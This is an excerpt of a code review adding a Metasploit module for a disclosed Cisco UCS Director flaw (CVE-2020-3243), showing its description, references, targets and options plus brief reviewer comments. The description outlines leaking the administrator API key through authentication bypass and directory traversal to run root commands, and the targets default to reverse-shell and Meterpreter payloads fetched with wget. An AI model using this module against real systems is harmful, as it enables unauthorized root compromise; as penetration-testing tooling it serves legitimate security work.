modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb

```diff
@@ -0,0 +1,307 @@
+  include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco UCS Director Cloupia Script RCE',
+        'Description' => %q{
+          This module exploits an authentication bypass and directory traversals
+          in Cisco UCS Director < 6.7.4.0 to leak the administrator's REST API
+          key and execute a Cloupia script containing an arbitrary root command.
+
+          Note that the primary functionality of this module is to leverage the
+          Cloupia script interpreter to execute code. This functionality is part
+          of the application's intended operation and considered a "foreverday."
+          The authentication bypass and directory traversals only get us there.
+
+          If you already have an API key, you may set it in the API_KEY option.
+          The LEAK_FILE option may be set if you wish to leak the API key from a
+          different absolute path, but normally this isn't advisable.
+
+          Tested on Cisco's VMware distribution of 6.7.3.0.
+        },
+        'Author' => [
+          'mr_me', # Discovery and exploit
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-3243'],
+          ['ZDI', '20-540'],
+          ['URL', 'https://srcincite.io/blog/2020/04/17/strike-three-symlinking-your-way-to-unauthenticated-access-against-cisco-ucs-director.html'],
+          ['URL', 'https://srcincite.io/pocs/src-2020-0014.py.txt']
+        ],
+        'DisclosureDate' => '2020-04-15', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_command,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          ],
+          [
+            'Linux Dropper',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => 'wget',
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('API_KEY', [false, 'API key if you have it']),
+      OptString.new(
+        'LEAK_FILE',
+        [
+          true,
```

Comment:
is this still required if the user already has the API key specified?

Reply:
It's required to be set, not necessarily required to be used. Specifying `API_KEY` yourself is if you have a post-auth foothold already. It'll leak the key if you don't have one.

Reply:
tl;dr Options are good. :)